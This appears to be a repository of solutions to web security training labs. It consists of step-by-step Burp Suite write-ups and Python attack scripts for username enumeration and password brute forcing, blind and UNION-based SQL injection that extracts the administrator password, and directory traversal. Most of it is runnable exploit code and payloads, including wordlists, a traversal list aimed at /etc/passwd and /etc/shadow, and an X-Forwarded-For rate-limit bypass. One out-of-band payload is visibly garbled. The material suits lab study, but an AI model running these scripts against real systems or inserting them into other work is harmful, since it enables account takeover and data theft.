vulnerabilities/Vulnerabilities in password-based login/Scripts/Username enumeration via different responses/script.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | 4 | if len(sys.argv) != 2: 5 | print(f"USAGE: {sys.argv[0]} domain") 6 | sys.exit(1) 7 | 8 | URL = sys.argv[1] 9 | 10 | path="login" 11 | url = URL+path 12 | 13 | response = requests.get(url) 14 | sess_cookie = response.cookies["session"] 15 | 16 | f1=open("usernames.txt","r") 17 | unames = list(f1) 18 | f2=open("passwords.txt","r") 19 | passwds = list(f2) 20 | 21 | for uname in unames: 22 | data = {'username':uname.strip(),'password':'test'} 23 | response2 = requests.post(url=url,data=data,headers={"Cookie": "session="+sess_cookie}) 24 | print(f"Trying [username : {uname.strip()}]") 25 | if 'Invalid username' not in response2.text: 26 | usrname = uname 27 | print(f"\nCorrect username : {usrname}") 28 | break 29 | for pswd in passwds: 30 | data = {'username':usrname.strip(),'password':pswd.strip()} 31 | response2 = requests.post(url=url,data=data,headers={"Cookie": "session="+sess_cookie}) 32 | print(f"Trying [username : {usrname.strip()} | password : {pswd.strip()}]") 33 | if 'Incorrect password' not in response2.text: 34 | print("Attack successful") 35 | print(f"Correct Credentials => [username : {usrname.strip()} | password : {pswd.strip()}]") 36 | break 37 | -------------------------------------------------------------------------------- /Authentication vulnerabilities/Vulnerabilities in password-based login/Scripts/Username enumeration via subtly different responses/script.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | 4 | if len(sys.argv) != 2: 5 | print(f"USAGE: {sys.argv[0]} domain") 6 | sys.exit(1) 7 | 8 | URL = sys.argv[1] 9 | 10 | path="login" 11 | url = URL+path 12 | 13 | response = requests.get(url) 14 | sess_cookie = response.cookies["session"] 15 | 16 | f1=open("usernames.txt","r") 17 | unames = list(f1) 18 | f2=open("passwords.txt","r") 19 | passwds = list(f2) 20 | 21 | for uname in unames: 22 | data = {'username':uname.strip(),'password':'test'} 23 | response2 = requests.post(url=url,data=data,headers={"Cookie": "session="+sess_cookie}) 24 | print(f"Trying [username : {uname.strip()}]") 25 | if 'Invalid username or password.' not in response2.text: 26 | usrname = uname 27 | print(f"\nCorrect username : {usrname}") 28 | break 29 | for pswd in passwds: 30 | data = {'username':usrname.strip(),'password':pswd.strip()} 31 | response2 = requests.post(url=url,data=data,headers={"Cookie": "session="+sess_cookie}) 32 | print(f"Trying [username : {usrname.strip()} | password : {pswd.strip()}]") 33 | if 'Invalid username or password ' not in response2.text: 34 | print("Attack successful") 35 | print(f"Correct Credentials => [username : {usrname.strip()} | password : {pswd.strip()}]") 36 | break 37 | -------------------------------------------------------------------------------- /SQL injection/Scripts/Blind SQLi/usingTimeDelay.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | import string 4 | import time 5 | 6 | if len(sys.argv) != 2: 7 | print(f"USAGE: {sys.argv[0]} domain") 8 | sys.exit(1) 9 | 10 | URL = sys.argv[1] 11 | 12 | dic = string.ascii_letters+string.digits 13 | response = requests.get(URL) 14 | tracking_id = response.cookies["TrackingId"] 15 | sess_cookie = response.cookies["session"] 16 | 17 | def password(url): 18 | 19 | pwd = "" 20 | i = 1 21 | while(True): 22 | found_char = False 23 | print(f"Index : {i}") 24 | for d in dic: 25 | payload = tracking_id + "'||(SELECT CASE WHEN (SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), "+str(i)+", 1) = '" +d+"') THEN pg_sleep(5) ELSE NULL END)--" 26 | #print("payload",payload) 27 | start = time.time() 28 | response = requests.get(URL, headers={"Cookie":"TrackingId="+payload+"; session="+sess_cookie}) 29 | end = time.time() 30 | 31 | delay = end-start 32 | if delay>=5: 33 | pwd += d 34 | print(pwd) 35 | found_char = True 36 | break 37 | time.sleep(1) 38 | i+=1 39 | 40 | if not found_char: 41 | print("Password : ",pwd) 42 | break 43 | 44 | password(URL) 45 | -------------------------------------------------------------------------------- /Authentication vulnerabilities/Vulnerabilities in password-based login/Scripts/Username enumeration via different responses/usernames.txt: -------------------------------------------------------------------------------- 1 | carlos 2 | root 3 | admin 4 | test 5 | guest 6 | info 7 | adm 8 | mysql 9 | user 10 | administrator 11 | oracle 12 | ftp 13 | pi 14 | puppet 15 | ansible 16 | ec2-user 17 | vagrant 18 | azureuser 19 | academico 20 | acceso 21 | access 22 | accounting 23 | accounts 24 | acid 25 | activestat 26 | ad 27 | adam 28 | adkit 29 | admin 30 | administracion 31 | administrador 32 | administrator 33 | administrators 34 | admins 35 | ads 36 | adserver 37 | adsl 38 | ae 39 | af 40 | affiliate 41 | affiliates 42 | afiliados 43 | ag 44 | agenda 45 | agent 46 | ai 47 | aix 48 | ajax 49 | ak 50 | akamai 51 | al 52 | alabama 53 | alaska 54 | albuquerque 55 | alerts 56 | alpha 57 | alterwind 58 | am 59 | amarillo 60 | americas 61 | an 62 | anaheim 63 | analyzer 64 | announce 65 | announcements 66 | antivirus 67 | ao 68 | ap 69 | apache 70 | apollo 71 | app 72 | app01 73 | app1 74 | apple 75 | application 76 | applications 77 | apps 78 | appserver 79 | aq 80 | ar 81 | archie 82 | arcsight 83 | argentina 84 | arizona 85 | arkansas 86 | arlington 87 | as 88 | as400 89 | asia 90 | asterix 91 | at 92 | athena 93 | atlanta 94 | atlas 95 | att 96 | au 97 | auction 98 | austin 99 | auth 100 | auto 101 | autodiscover 102 | -------------------------------------------------------------------------------- /Authentication vulnerabilities/Vulnerabilities in password-based login/Scripts/Username enumeration via subtly different responses/usernames.txt: -------------------------------------------------------------------------------- 1 | carlos 2 | root 3 | admin 4 | test 5 | guest 6 | info 7 | adm 8 | mysql 9 | user 10 | administrator 11 | oracle 12 | ftp 13 | pi 14 | puppet 15 | ansible 16 | ec2-user 17 | vagrant 18 | azureuser 19 | academico 20 | acceso 21 | access 22 | accounting 23 | accounts 24 | acid 25 | activestat 26 | ad 27 | adam 28 | adkit 29 | admin 30 | administracion 31 | administrador 32 | administrator 33 | administrators 34 | admins 35 | ads 36 | adserver 37 | adsl 38 | ae 39 | af 40 | affiliate 41 | affiliates 42 | afiliados 43 | ag 44 | agenda 45 | agent 46 | ai 47 | aix 48 | ajax 49 | ak 50 | akamai 51 | al 52 | alabama 53 | alaska 54 | albuquerque 55 | alerts 56 | alpha 57 | alterwind 58 | am 59 | amarillo 60 | americas 61 | an 62 | anaheim 63 | analyzer 64 | announce 65 | announcements 66 | antivirus 67 | ao 68 | ap 69 | apache 70 | apollo 71 | app 72 | app01 73 | app1 74 | apple 75 | application 76 | applications 77 | apps 78 | appserver 79 | aq 80 | ar 81 | archie 82 | arcsight 83 | argentina 84 | arizona 85 | arkansas 86 | arlington 87 | as 88 | as400 89 | asia 90 | asterix 91 | at 92 | athena 93 | atlanta 94 | atlas 95 | att 96 | au 97 | auction 98 | austin 99 | auth 100 | auto 101 | autodiscover 102 | -------------------------------------------------------------------------------- /Authentication vulnerabilities/Vulnerabilities in password-based login/Scripts/Username enumeration via different responses/passwords.txt: -------------------------------------------------------------------------------- 1 | 123456 2 | password 3 | 12345678 4 | qwerty 5 | 123456789 6 | 12345 7 | 1234 8 | 111111 9 | 1234567 10 | dragon 11 | 123123 12 | baseball 13 | abc123 14 | football 15 | monkey 16 | letmein 17 | shadow 18 | master 19 | 666666 20 | qwertyuiop 21 | 123321 22 | mustang 23 | 1234567890 24 | michael 25 | 654321 26 | superman 27 | 1qaz2wsx 28 | 7777777 29 | 121212 30 | 000000 31 | qazwsx 32 | 123qwe 33 | killer 34 | trustno1 35 | jordan 36 | jennifer 37 | zxcvbnm 38 | asdfgh 39 | hunter 40 | buster 41 | soccer 42 | harley 43 | batman 44 | andrew 45 | tigger 46 | sunshine 47 | iloveyou 48 | 2000 49 | charlie 50 | robert 51 | thomas 52 | hockey 53 | ranger 54 | daniel 55 | starwars 56 | klaster 57 | 112233 58 | george 59 | computer 60 | michelle 61 | jessica 62 | pepper 63 | 1111 64 | zxcvbn 65 | 555555 66 | 11111111 67 | 131313 68 | freedom 69 | 777777 70 | pass 71 | maggie 72 | 159753 73 | aaaaaa 74 | ginger 75 | princess 76 | joshua 77 | cheese 78 | amanda 79 | summer 80 | love 81 | ashley 82 | nicole 83 | chelsea 84 | biteme 85 | matthew 86 | access 87 | yankees 88 | 987654321 89 | dallas 90 | austin 91 | thunder 92 | taylor 93 | matrix 94 | mobilemail 95 | mom 96 | monitor 97 | monitoring 98 | montana 99 | moon 100 | moscow 101 | -------------------------------------------------------------------------------- /Authentication vulnerabilities/Vulnerabilities in password-based login/Scripts/Username enumeration via subtly different responses/passwords.txt: -------------------------------------------------------------------------------- 1 | 123456 2 | password 3 | 12345678 4 | qwerty 5 | 123456789 6 | 12345 7 | 1234 8 | 111111 9 | 1234567 10 | dragon 11 | 123123 12 | baseball 13 | abc123 14 | football 15 | monkey 16 | letmein 17 | shadow 18 | master 19 | 666666 20 | qwertyuiop 21 | 123321 22 | mustang 23 | 1234567890 24 | michael 25 | 654321 26 | superman 27 | 1qaz2wsx 28 | 7777777 29 | 121212 30 | 000000 31 | qazwsx 32 | 123qwe 33 | killer 34 | trustno1 35 | jordan 36 | jennifer 37 | zxcvbnm 38 | asdfgh 39 | hunter 40 | buster 41 | soccer 42 | harley 43 | batman 44 | andrew 45 | tigger 46 | sunshine 47 | iloveyou 48 | 2000 49 | charlie 50 | robert 51 | thomas 52 | hockey 53 | ranger 54 | daniel 55 | starwars 56 | klaster 57 | 112233 58 | george 59 | computer 60 | michelle 61 | jessica 62 | pepper 63 | 1111 64 | zxcvbn 65 | 555555 66 | 11111111 67 | 131313 68 | freedom 69 | 777777 70 | pass 71 | maggie 72 | 159753 73 | aaaaaa 74 | ginger 75 | princess 76 | joshua 77 | cheese 78 | amanda 79 | summer 80 | love 81 | ashley 82 | nicole 83 | chelsea 84 | biteme 85 | matthew 86 | access 87 | yankees 88 | 987654321 89 | dallas 90 | austin 91 | thunder 92 | taylor 93 | matrix 94 | mobilemail 95 | mom 96 | monitor 97 | monitoring 98 | montana 99 | moon 100 | moscow 101 | -------------------------------------------------------------------------------- /Authentication vulnerabilities/Vulnerabilities in password-based login/Username enumeration via different responses.md: -------------------------------------------------------------------------------- 1 | Step 1 : Navigate to login page of the given lab. 2 | 3 | Step 2 : Enter any random `username` and `password` and send and in parallel intercept this request using BurpSuite. 4 | 5 | Step 3 : Send this intercepted request to `Intruder` tab. 6 | 7 | Step 4 : Choose Attack type `Sniper` and click on `Clear §`. Then choose the value of parameter `username` and click on `Add §`. Next, Go to `Payloads` sub-tab, choose Payload type as `Simple List` and next paste the given usernames list in the `Payload Options` box. Now go back to `Positions` tab and click on `Start Attack`. The attack will start in a new window. Now, you can observe the difference between correct username ot incorrect username either on the basis of status code, length, error or timeout. In this given lab, if we cling on length heading then we will get the output in some arrange manner. 8 | 9 | Step 5 : We observe that the payload `akamai`(in this cas only) has different length than other payloads. So, we can check it by entering `affiliate` as username and something random as password. So, it will show that `Incorrect Password` instead of `Incorrect Username`. So, this confirms that, we are on right path. 10 | 11 | Step 6 : Repeat Step 4 in terms of Password but enter the username that you find from the above steps. 12 | 13 | Step 7 : Observe the status code. The one with different status code is the correct password. Login to the given page to complete the lab. 14 | -------------------------------------------------------------------------------- /Authentication vulnerabilities/Vulnerabilities in password-based login/Username enumeration via subtly different responses.md: -------------------------------------------------------------------------------- 1 | Step 1 : Navigate to login page of the given lab. 2 | 3 | Step 2 : Enter any random `username` and `password` and send and in parallel intercept this request using BurpSuite. 4 | 5 | Step 3 : Send this intercepted request to `Intruder` tab. 6 | 7 | Step 4 : Choose Attack type `Sniper` and click on `Clear §`. Then choose the value of parameter `username` and click on `Add §`. Next, Go to `Payloads` sub-tab, choose Payload type as `Simple List` and next paste the given usernames list in the `Payload Options` box. Next, go to `Options` tab under `Grep - Extract`, click `Add`. In this dialog box appears, scroll down and highlight the text `Invalid username or password.` ans click `OK`. Now go back to `Positions` tab and click on `Start Attack`. The attack will start in a new window. Now, you can observe the difference between correct username ot incorrect username either on the basis of status code, length, error or timeout. In this given lab, if we lab, we will check for error message. 8 | 9 | Step 5 : When the attack is finished, there is an additional column containing the `error message` you extracted. Sort the results using this column to notice that one of them is subtly different. We observe that the payload `ads`(in this case only) has different error message (basically a typoerror) than other payloads. 10 | 11 | Step 6 : Repeat Step 4 in terms of Password but enter the username and that you find from the above steps. 12 | 13 | Step 7 : Observe the error message. The one with different no error message is the correct password. Login to the given page to complete the lab. 14 | -------------------------------------------------------------------------------- /SQL injection/(PRACTITIONER) Lab : Blind SQL injection with out-of-band data exfiltration.md: -------------------------------------------------------------------------------- 1 | Step 1 : Intercept the request using BurpSuite Pro. 2 | 3 | Step 2 : Modify the TrackingId cookie, changing it to a payload that will trigger an interaction with the Collaborator server. For example, you can combine SQL injection with basic XXE techniques as follows: 4 | ``` 5 | ' UNION SELECT extractvalue(xmltype(' %remote;]>'),'/l') FROM dual-- 6 | ``` 7 | 8 | Step 3: Go to Burp Collaborator Client and copy the subdomain and paste it in payload. For eg: 9 | ``` 10 | ' UNION SELECT extractvalue(xmltype(' %remote;]>'),'/l') FROM dual-- 11 | ``` 12 | 13 | Step 4: Copy and paste it after TrakingId Cookie, then URL encode it then send. 14 | 15 | Step 5: Now go to Burp Collaborator, and press 'Poll now' to confirm that a DNS lookup occurred. 16 | 17 | Step 6: You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload. The password of the administrator user should appear in the subdomain of the interaction, and you can view this within the Burp Collaborator client. For DNS interactions, the full domain name that was looked up is shown in the Description tab. For HTTP interactions, the full domain name is shown in the Host header in the Request to Collaborator tab. 18 | 19 | Step 7: Click "My account" to open the login page. Use the password to log in as the administrator user. 20 | -------------------------------------------------------------------------------- /SQL injection/(PRACTITIONER) Lab : Blind SQL injection with conditional responses.md: -------------------------------------------------------------------------------- 1 | In this lab `Tracking Id` cookie is vulnerable to `SQL Injection`. 2 | 3 | You can check this using the following statements sending them with the value of `tracking id`: 4 | ```sql 5 | ' AND '1'='1 #This will print "Welcome Back" 6 | ' AND '1'='2 #This will not print "Welcome Back" 7 | ``` 8 | 9 | We can systematically determine the password for the given user `administrator` by sending a series of inputs to test the password one character at a time. 10 | ```sql 11 | ' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) = 'char 12 | ``` 13 | 14 | You can use the following script to find the password: 15 | ```python 16 | import sys 17 | import requests 18 | import string 19 | import time 20 | 21 | if len(sys.argv) != 2: 22 | print(f"USAGE: {sys.argv[0]} domain") 23 | sys.exit(1) 24 | 25 | URL = sys.argv[1] 26 | 27 | dic = string.ascii_letters+string.digits 28 | response = requests.get(URL) 29 | tracking_id = response.cookies["TrackingId"] 30 | sess_cookie = response.cookies["session"] 31 | 32 | def password(url): 33 | 34 | pwd = "" 35 | i = 1 36 | while(True): 37 | found_char = False 38 | print(f"Index : {i}") 39 | for d in dic: 40 | payload = tracking_id + "' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), "+str(i)+", 1) = '" +d 41 | response = requests.get(URL, headers={"Cookie":"TrackingId="+payload+"; session="+sess_cookie}) 42 | if "Welcome back!" in response.text: 43 | pwd += d 44 | print(pwd) 45 | found_char = True 46 | break 47 | time.sleep(1) 48 | i+=1 49 | 50 | if not found_char: 51 | print("Password : ",pwd) 52 | break 53 | 54 | password(URL) 55 | ``` 56 | -------------------------------------------------------------------------------- /Authentication vulnerabilities/Vulnerabilities in password-based login/Username enumeration via response timing.md: -------------------------------------------------------------------------------- 1 | Step 1 : Navigate to login page of the given lab. 2 | 3 | Step 2 : Enter any random `username` and `password` and send and in parallel intercept this request using BurpSuite. 4 | 5 | Step 3 : Send this intercepted request to `Intruder` tab. 6 | 7 | Step 4 : Choose Attack type `Sniper` and click on `Clear §`. Then choose the value of parameter `username` and click on `Add §`. Next, Go to `Payloads` sub-tab, choose Payload type as `Simple List` and next paste the given usernames list in the `Payload Options` box. Next, go to `Options` tab under `Grep - Extract`, click `Add`. In this dialog box appears, scroll down and highlight the text `Invalid username or password.` ans click `OK`. Now go back to `Positions` tab and click on `Start Attack`. The attack will start in a new window. Now, you can observe the difference between correct username ot incorrect username either on the basis of status code, length, error or timeout. In this given lab, if we lab, we will check for error message. In these error messages, we will notice : `You have made too many incorrect login attempts. Please try again in 30 minute(s)` as response so it may be possible that our IP address is being blocked because of many requests at a time. 8 | 9 | Step 5 : Identify that the `X-Forwarded-For` header is supported, which allows you to spoof your IP address and bypass the IP-based brute-force protection. 10 | 11 | Step 6 : Send the request to Burp Intruder and select the attack type to `Pitchfork`. Clear the default payload positions and add the X-Forwarded-For header. Add payload positions for the X-Forwarded-For header and the username 12 | 13 | Step 7 : On the Payloads tab, select payload set 1. Select the Numbers payload type. Enter the range 1 - 100 and set the step to 1. Set the max fraction digits to 0. This will be used to spoof your IP. Select payload set 2 and add the list of usernames. Start the attack. 14 | 15 | Step 8 : Notice that one of the response times was significantly longer than the others. Repeat this request a few times to make sure it consistently takes longer, then make a note of this username. 16 | 17 | Step 9 : Repeat Step 5,6,7 in terms of Password but enter the username and that you find from the above steps. 18 | 19 | Step 10 : Observe the status code. Login to the given page to complete the lab. 20 | -------------------------------------------------------------------------------- /SQL injection/(APPRENTICE) Lab : Blind SQL injection with conditional errors.md: -------------------------------------------------------------------------------- 1 | In this lab `Tracking Id` cookie is vulnerable to `SQL Injection`. 2 | 3 | You can check this using the following statements sending them with the value of `tracking id`: 4 | ```sql 5 | ' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a 6 | ' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a 7 | ``` 8 | These inputs use the CASE keyword to test a condition and return a different expression depending on whether the expression is true. With the first input, the CASE expression evaluates to 'a', which does not cause any error. With the second input, it evaluates to 1/0, which causes a divide-by-zero error. Assuming the error causes some difference in the application's HTTP response, we can use this difference to infer whether the injected condition is true. 9 | 10 | We can systematically determine the password for the given user `administrator` by sending a series of inputs to test the password one character at a time. 11 | ```sql 12 | ' AND (SELECT CASE WHEN (Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') THEN 1/0 ELSE 'a' END FROM Users)='a 13 | ``` 14 | 15 | You can use the following script to find the password: 16 | ```python 17 | import sys 18 | import requests 19 | import string 20 | import time 21 | 22 | if len(sys.argv) != 2: 23 | print(f"USAGE: {sys.argv[0]} ") 24 | sys.exit(1) 25 | 26 | URL = sys.argv[1] 27 | 28 | dic = string.ascii_letters+string.digits 29 | response = requests.get(URL) 30 | tracking_id = response.cookies["TrackingId"] 31 | sess_cookie = response.cookies["session"] 32 | 33 | def password(url): 34 | 35 | pwd = "" 36 | i = 1 37 | while(True): 38 | found_char = False 39 | print(f"Index : {i}") 40 | for d in dic: 41 | payload = tracking_id + "' AND (SELECT CASE WHEN (SUBSTR((SELECT password FROM users WHERE username='administrator'), "+str(i)+",1) = '"+d+"') THEN to_char(1/0) ELSE 'a' END FROM Dual)='a" 42 | response = requests.get(URL, headers={"Cookie":"TrackingId="+payload+"; session="+sess_cookie}) 43 | if "Internal Server Error" in response.text: 44 | pwd += d 45 | print(pwd) 46 | found_char = True 47 | break 48 | time.sleep(1) 49 | i+=1 50 | 51 | if not found_char: 52 | print("Password : ",pwd) 53 | break 54 | 55 | password(URL) 56 | ``` 57 | -------------------------------------------------------------------------------- /SQL injection/(PRACTITIONER) Lab : Blind SQL injection with time delays and information retrieval.md: -------------------------------------------------------------------------------- 1 | In this lab `Tracking Id` cookie is vulnerable to `SQL Injection`. 2 | 3 | You can check this using the following statements sending them with the value of `tracking id`: 4 | ```sql 5 | ';SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- #This will late the response by 10sec 6 | URL encoded : '%3bSELECT+CASE+WHEN+(1%3d1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END-- 7 | ``` 8 | 9 | You can check this using the following statements sending them with the value of `tracking id` whether the username = 'administrator' exists or not: 10 | ```sql 11 | ';SELECT CASE WHEN (username='administrator') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users-- #Ir response comes after 10 sec, then username='administrator' exists 12 | URL encoded : '%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users-- 13 | ``` 14 | 15 | We can systematically determine the password for the given user `administrator` by sending a series of inputs to test the password one character at a time. 16 | ```sql 17 | '||(SELECT CASE WHEN (SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), "+str(i)+", 1) = '" +d+"') THEN pg_sleep(5) ELSE NULL END)-- 18 | ``` 19 | 20 | You can use the following script to find the password: 21 | ```python 22 | import sys 23 | import requests 24 | import string 25 | import time 26 | 27 | if len(sys.argv) != 2: 28 | print(f"USAGE: {sys.argv[0]} domain") 29 | sys.exit(1) 30 | 31 | URL = sys.argv[1] 32 | 33 | dic = string.ascii_letters+string.digits 34 | response = requests.get(URL) 35 | tracking_id = response.cookies["TrackingId"] 36 | sess_cookie = response.cookies["session"] 37 | 38 | def password(url): 39 | 40 | pwd = "" 41 | i = 1 42 | while(True): 43 | found_char = False 44 | print(f"Index : {i}") 45 | for d in dic: 46 | payload = tracking_id + "'||(SELECT CASE WHEN (SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), "+str(i)+", 1) = '" +d+"') THEN pg_sleep(5) ELSE NULL END)--" 47 | #print("payload",payload) 48 | start = time.time() 49 | response = requests.get(URL, headers={"Cookie":"TrackingId="+payload+"; session="+sess_cookie}) 50 | end = time.time() 51 | 52 | delay = end-start 53 | if delay>=5: 54 | pwd += d 55 | print(pwd) 56 | found_char = True 57 | break 58 | time.sleep(1) 59 | i+=1 60 | 61 | if not found_char: 62 | print("Password : ",pwd) 63 | break 64 | 65 | password(URL) 66 | ``` 67 | -------------------------------------------------------------------------------- /SQL injection/Scripts/For Microsoft OR MySQL Database/script.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | import string 4 | import time 5 | 6 | if len(sys.argv) != 2: 7 | print(f"USAGE: {sys.argv[0]} ") 8 | sys.exit(1) 9 | 10 | URL = sys.argv[1] 11 | 12 | def findCols(url): 13 | i = 1 14 | cols = 0 15 | while True: 16 | payload = "' ORDER BY +" + str(i) + "--+" 17 | response = requests.get(url + payload) 18 | if response.status_code != 200: 19 | cols = i - 1 20 | #print(f"Number of columns : {(i -1)}") 21 | break 22 | i += 1 23 | return cols 24 | 25 | def findColsNull(url): 26 | i=1 27 | cols = 0 28 | while True: 29 | #print(i) 30 | payload = url + "' UNION SELECT "+str("NULL,"*i)+"--+" 31 | payload = payload[:-4]+payload[-3:] 32 | #print(payload) 33 | response = requests.get(payload) 34 | if response.status_code == 200: 35 | cols = i 36 | #print(f"Number of columns : {i}") 37 | break 38 | i += 1 39 | return cols 40 | 41 | def checkCol(url): 42 | cols = findCols(url) 43 | strlist = [] 44 | i=1 45 | payload1 = url 46 | payload2 = "' UNION SELECT "+str("NULL,"*cols)+"--+" 47 | for i in range(15,len(payload2),5): 48 | if "NULL" in payload2[i:]: 49 | mpayload = payload2[:i]+"'a',"+payload2[(i+5):] 50 | mpayload = mpayload[:-4]+mpayload[-3:] 51 | #print(mpayload) 52 | 53 | response = requests.get(payload1 + mpayload) 54 | if response.status_code == 200: 55 | strlist.append(1) 56 | else: 57 | strlist.append(0) 58 | for i in range(len(strlist)): 59 | if strlist[i]==1: 60 | print(str(i+1)+"th column contains text") 61 | 62 | def checkVersion(url): 63 | cols = findCols(url) 64 | payload = "'UNION SELECT @@version"+str(",NULL"*(cols-1))+"--+" 65 | #print(payload) 66 | response = requests.get(url+payload) 67 | #print(response.headers) 68 | if response.status_code == 200: 69 | print("It's either Microsoft or MySQL Database") 70 | else: 71 | print("It's neither Microsoft nor MySQL Database") 72 | print() 73 | print("Do You still want to know the version of database? (Press 1 for Yes else press any other number)") 74 | choice = int(input()) 75 | if choice == 1: 76 | print("\n\nThank You for using this script\n\n") 77 | print("********************Check the VERSION in response text below**********************\n\n\n\n") 78 | print(response.text) 79 | else: 80 | print("Thank You for using this script") 81 | 82 | 83 | def choiceDecider(): 84 | print("\n\n\nPress 1 for finding number of Columns using 'ORDER BY' \nPress 2 for finding number of Columns using 'UNION SELECT' \nPress 3 for finding columns that contains text \nPress 4 for finding type and version of database\nPress 5 to exit" ) 85 | choice = int(input()) 86 | if choice==1: 87 | print("Number of Columns : ", findCols(URL)) 88 | choiceDecider() 89 | elif choice==2: 90 | print("Number of Columns : ", findColsNull(URL)) 91 | choiceDecider() 92 | elif choice==3: 93 | checkCol(URL) 94 | choiceDecider() 95 | elif choice==4: 96 | checkVersion(URL) 97 | choiceDecider() 98 | elif choice==5: 99 | exit() 100 | else: 101 | print("WRONG CHOICE") 102 | choiceDecider() 103 | 104 | choiceDecider() 105 | -------------------------------------------------------------------------------- /SQL injection/Scripts/For Oracle Database/script.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | import string 4 | import time 5 | 6 | if len(sys.argv) != 2: 7 | print(f"USAGE: {sys.argv[0]} ") 8 | sys.exit(1) 9 | 10 | URL = sys.argv[1] 11 | 12 | def findCols(url): 13 | i = 1 14 | cols = 0 15 | while True: 16 | payload = "' ORDER BY +" + str(i) + "--" 17 | response = requests.get(url + payload) 18 | if response.status_code != 200: 19 | cols = i - 1 20 | #print(f"Number of columns : {(i -1)}") 21 | break 22 | i += 1 23 | return cols 24 | 25 | def findColsNull(url): 26 | i=1 27 | cols = 0 28 | while True: 29 | #print(i) 30 | payload = url + "' UNION SELECT "+str("NULL,"*i)+" FROM dual--" 31 | #print(payload) 32 | payload = payload[:-13]+payload[-12:] 33 | #print(payload) 34 | response = requests.get(payload) 35 | if response.status_code == 200: 36 | cols = i 37 | #print(f"Number of columns : {i}") 38 | break 39 | i += 1 40 | return cols 41 | 42 | def checkCol(url): 43 | cols = findCols(url) 44 | strlist = [] 45 | i=1 46 | payload1 = url 47 | payload2 = "' UNION SELECT "+str("NULL,"*cols)+" FROM dual--" 48 | for i in range(15,len(payload2),5): 49 | if "NULL" in payload2[i:]: 50 | mpayload = payload2[:i]+"'a',"+payload2[(i+5):] 51 | mpayload = mpayload[:-13]+mpayload[-12:] 52 | #print(mpayload) 53 | 54 | response = requests.get(payload1 + mpayload) 55 | if response.status_code == 200: 56 | strlist.append(1) 57 | else: 58 | strlist.append(0) 59 | for i in range(len(strlist)): 60 | if strlist[i]==1: 61 | print(str(i+1)+"th column contains text") 62 | 63 | def checkVersion(url): 64 | cols = findCols(url) 65 | payload = "'UNION SELECT BANNER"+str(",NULL"*(cols-1))+" FROM v$version--" 66 | print(payload) 67 | response = requests.get(url+payload) 68 | print(response.status_code) 69 | if response.status_code == 200: 70 | print("It's Oracle Database") 71 | else: 72 | print("It's NOT Oracle Database") 73 | print() 74 | print("Do You still want to know the version of database? (Press 1 for Yes else press any other number)") 75 | choice = int(input()) 76 | if choice == 1: 77 | print("\n\nThank You for using this script\n\n") 78 | print("********************Check the VERSION in response text below**********************\n\n\n\n") 79 | print(response.text) 80 | else: 81 | print("Thank You for using this script") 82 | 83 | 84 | def choiceDecider(): 85 | print("\n\n\nPress 1 for finding number of Columns using 'ORDER BY' \nPress 2 for finding number of Columns using 'UNION SELECT' \nPress 3 for finding columns that contains text \nPress 4 for finding type and version of database\nPress 5 to exit" ) 86 | choice = int(input()) 87 | if choice==1: 88 | print("Number of Columns : ", findCols(URL)) 89 | choiceDecider() 90 | elif choice==2: 91 | print("Number of Columns : ", findColsNull(URL)) 92 | choiceDecider() 93 | elif choice==3: 94 | checkCol(URL) 95 | choiceDecider() 96 | elif choice==4: 97 | checkVersion(URL) 98 | choiceDecider() 99 | elif choice==5: 100 | exit() 101 | else: 102 | print("WRONG CHOICE") 103 | choiceDecider() 104 | 105 | choiceDecider() 106 | -------------------------------------------------------------------------------- /Directory traversal/Script/dirlist.txt: -------------------------------------------------------------------------------- 1 | /etc/master.passwd 2 | /master.passwd 3 | etc/passwd 4 | etc/shadow%00 5 | /etc/passwd 6 | /etc/passwd%00 7 | ../etc/passwd 8 | ../etc/passwd%00 9 | ../../etc/passwd 10 | ../../etc/passwd%00 11 | ../../../etc/passwd 12 | ../../../etc/passwd%00 13 | ../../../../etc/passwd 14 | ../../../../etc/passwd%00 15 | ../../../../../etc/passwd 16 | ../../../../../etc/passwd%00 17 | ../../../../../../etc/passwd 18 | ../../../../../../etc/passwd%00 19 | ../../../../../../../etc/passwd 20 | ../../../../../../../etc/passwd%00 21 | ../../../../../../../../etc/passwd 22 | ../../../../../../../../etc/passwd%00 23 | ../../../../../../../../../etc/passwd 24 | ../../../../../../../../../etc/passwd%00 25 | ../../../../../../../../../../etc/passwd 26 | ../../../../../../../../../../etc/passwd%00 27 | ../../../../../../../../../../../etc/passwd 28 | ../../../../../../../../../../../etc/passwd%00 29 | ../../../../../../../../../../../../etc/passwd 30 | ../../../../../../../../../../../../etc/passwd%00 31 | ../../../../../../../../../../../../../etc/passwd 32 | ../../../../../../../../../../../../../etc/passwd%00 33 | ../../../../../../../../../../../../../../etc/passwd 34 | ../../../../../../../../../../../../../../etc/passwd%00 35 | ../../../../../../../../../../../../../../../etc/passwd 36 | ../../../../../../../../../../../../../../../etc/passwd%00 37 | ../../../../../../../../../../../../../../../../etc/passwd 38 | ../../../../../../../../../../../../../../../../etc/passwd%00 39 | ../../../../../../../../../../../../../../../../../etc/passwd 40 | ../../../../../../../../../../../../../../../../../etc/passwd%00 41 | ../../../../../../../../../../../../../../../../../../etc/passwd 42 | ../../../../../../../../../../../../../../../../../../etc/passwd%00 43 | ../../../../../../../../../../../../../../../../../../../etc/passwd 44 | ../../../../../../../../../../../../../../../../../../../etc/passwd%00 45 | ../../../../../../../../../../../../../../../../../../../../etc/passwd 46 | 